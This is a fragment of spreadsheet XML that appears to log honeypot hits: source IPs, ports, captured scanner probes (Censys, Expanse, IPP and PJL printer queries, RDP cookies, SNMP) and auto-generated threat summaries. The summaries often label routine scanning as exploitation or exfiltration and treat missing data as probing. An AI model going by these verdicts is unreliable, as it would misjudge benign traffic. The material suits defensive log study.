'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58720'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=50693'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=48877'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,40534)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58965'}}&amp;&amp;{Data_HTTP:{'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.90.63.129:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.113.33:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '*IDN?
'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,54406)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,39912)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': ' x01n'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 149.102.153.168:9100_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:a75e:8ab9</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and potentially exploit various network services, including databases, file servers, and authentication systems. They are using a combination of techniques such as port scanning, banner grabbing, and brute-force attacks to identify vulnerable targets. &amp;&amp; An unknown user is sending a POST request with IPP application data to a printer-like service on an IP address, which may be a scanning or probing activity. This could be a reconnaissance attempt or a malicious script trying to exploit the service. The unusual User-Agent string suggests it might be automated software. &amp;&amp; A POST request with a large content length is being sent to the device's printer port, which could be an attempt to exploit or inject malicious code into the system's print queue. This type of activity may indicate a potential vulnerability or attack on the system's printing functionality. The user agent suggests a scanning tool is involved. &amp;&amp; A POST request with a large content length was sent to port 631 on IP address 38.60.171.39, suggesting an attempt to upload malicious data through a potentially vulnerable printer service.
The content type is application/ipp, which indicates it's related to printer or imaging protocol communications.
This could be a reconnaissance or exploitation attempt against the printer service. &amp;&amp; A POST request is being sent to a printer service on IP address 38.60.171.39, indicating possible scanning or probing activity for printer exploitation vulnerabilities.
The User-Agent string suggests the request is likely automated, possibly from a reconnaissance tool or scanner.
This may be an attempt to exploit a specific vulnerability in printer services. &amp;&amp; No suspicious activity detected, data is missing or unknown for IRC-related events. &amp;&amp; No valid log data is available as Data_HTTPS is marked as NA, indicating no activity or error occurred for HTTPS connections. 
This could indicate that the service is down or not functioning properly for HTTPS requests.
Alternatively, it might mean there was no attempt to access the service via HTTPS. &amp;&amp; The data suggests an attempt to retrieve printer information, possibly for reconnaissance or exploitation purposes.
This could be a sign of an attacker trying to identify vulnerable systems on the network. 
It may also indicate a prelude to more malicious activities like unauthorized access or data exfiltration. &amp;&amp; Possible malicious activity is an unauthorized printer query, attempting to retrieve device information, which could be a reconnaissance step before potential further exploitation. This may indicate attempted access or scanning of internal devices. A potentially malicious actor is probing the system for vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve"> Port scanning and exploitation  &amp;&amp; SMB Scanning &amp;&amp; IP Print Attack &amp;&amp; Unknown Access &amp;&amp; Printer Hack &amp;&amp; Printer Hack &amp;&amp; Port Scan &amp;&amp; Scanning Web</t>
  </si>
  <si>
    <t>15d222649fd9b4fd2adce9fbff6dd7de</t>
  </si>
  <si>
    <t>198.235.24.90</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_IRC_H2&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MSSQL_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;161&amp;&amp;6379&amp;&amp;143&amp;&amp;22&amp;&amp;1521&amp;&amp;3389&amp;&amp;80&amp;&amp;3306&amp;&amp;1080&amp;&amp;6667&amp;&amp;5432&amp;&amp;9100&amp;&amp;443&amp;&amp;445&amp;&amp;51336&amp;&amp;110&amp;&amp;5900&amp;&amp;54106&amp;&amp;52431&amp;&amp;1433&amp;&amp;50041&amp;&amp;23&amp;&amp;NA&amp;&amp;389&amp;&amp;55159&amp;&amp;64630&amp;&amp;55695&amp;&amp;53212&amp;&amp;55801&amp;&amp;50216&amp;&amp;55283&amp;&amp;59502&amp;&amp;8443</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QtKcqcNrA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AbKdCE'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZtbjULYZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EmaAmw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bEGHrs'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61372)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61382)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61396)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64752)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64758)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64764)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61500)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61508)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61524)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jXYWWEVvY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ndyoNb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NxnBEF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DHezKVMzk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LUDRnP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QzVOkK'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iKpnszXju'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eVzTOU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ulMCnN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NQpnHvjuk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RmBemN'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:185a</t>
  </si>
  <si>
    <t>The data indicates that an attempt was made to access the system's directory services, likely to gain unauthorized access or obtain sensitive information. This could be a reconnaissance phase for further malicious activity. The attempt failed as indicated by "NA" status. &amp;&amp; No activity detected for LDAP service. Data is missing or unavailable, indicating potential probing or scanning. This could be an initial reconnaissance attempt by an attacker. &amp;&amp; No SIP traffic was detected, which could indicate a potential reconnaissance or scanning activity to identify vulnerable services. This might be an attempt to gather information about the system's configuration. The absence of SIP traffic may also suggest that the system is not being actively targeted by malware. &amp;&amp; A client is sending a CAPABILITY command to an IMAP service, likely attempting to gather information about the server's capabilities. This could be a reconnaissance step in a broader malicious activity. The fact that no data is being sent suggests it may not be a brute-force login attempt at this stage. &amp;&amp; No malicious activity detected for FTP service as no data was received. The lack of data suggests either the connection was dropped or the user disconnected prematurely. This is an indication of possibly a failed login attempt or a test probe. &amp;&amp; No log data provided, unable to analyze or comment on possible malicious activity. &amp;&amp; Malicious entity is attempting to negotiate capabilities with a server, potentially preparing for unauthorized access or command execution. This can be a reconnaissance step before carrying out more serious malicious activity. It indicates probing of server functionality. &amp;&amp; A malicious actor is attempting to exploit a service by issuing an initial request to determine supported features, potentially as a precursor to unauthorized access. This could be part of a reconnaissance or exploitation attempt. The actor may be probing for vulnerabilities in the system's configuration.</t>
  </si>
  <si>
    <t>LDAP Scan &amp;&amp; Scanning Attempt &amp;&amp; Scanning Attempt &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>58bea4550850a9ab5ef5d50354d4390e</t>
  </si>
  <si>
    <t>117.255.67.205</t>
  </si>
  <si>
    <t>Wimax Project</t>
  </si>
  <si>
    <t>::ffff:75ff:43cd</t>
  </si>
  <si>
    <t>076aa0fed9002e30609dc7499cb982fe</t>
  </si>
  <si>
    <t>59.89.135.140</t>
  </si>
  <si>
    <t>2004-09-06</t>
  </si>
  <si>
    <t>::ffff:3b59:878c</t>
  </si>
  <si>
    <t>3e4ba3edda6fda30807f38952508f66b</t>
  </si>
  <si>
    <t>121.186.175.215</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;NA</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:79ba:afd7</t>
  </si>
  <si>
    <t>a69f23dcabf9cb2f59b8321f1eb6fcfe</t>
  </si>
  <si>
    <t>120.61.19.167</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>MTNL Pool Through BSNL</t>
  </si>
  <si>
    <t>2008-03-19</t>
  </si>
  <si>
    <t>MTNL</t>
  </si>
  <si>
    <t>::ffff:783d:13a7</t>
  </si>
  <si>
    <t>85185ac185c6864197d0cd9b3de270e6</t>
  </si>
  <si>
    <t>202.83.19.120</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5764&amp;&amp;3306&amp;&amp;35135&amp;&amp;7226&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>24309</t>
  </si>
  <si>
    <t>Atria Convergence Technologies Pvt. Ltd.,</t>
  </si>
  <si>
    <t>Atria Convergence Technologies Pvt. Ltd</t>
  </si>
  <si>
    <t>Atria Convergence Technologies Pvt Ltd</t>
  </si>
  <si>
    <t>2004-09-21</t>
  </si>
  <si>
    <t>CableLite</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.120,49717)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.120,52931)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:ca53:1378</t>
  </si>
  <si>
    <t>The attacker is attempting to perform a reconnaissance of the network and identify potential vulnerabilities. They are scanning for various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; MySQL database attempted unauthorized access, potentially for password cracking or data exfiltration. The attempt may be part of a larger malicious campaign to breach database security. This could indicate a scanning activity by an attacker.</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>c6d3973adce24b91902450e4b37a5465</t>
  </si>
  <si>
    <t>147.185.132.82</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Credential_Stuffing_Attack_High</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_REDIS_H1&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SIP_H33&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LA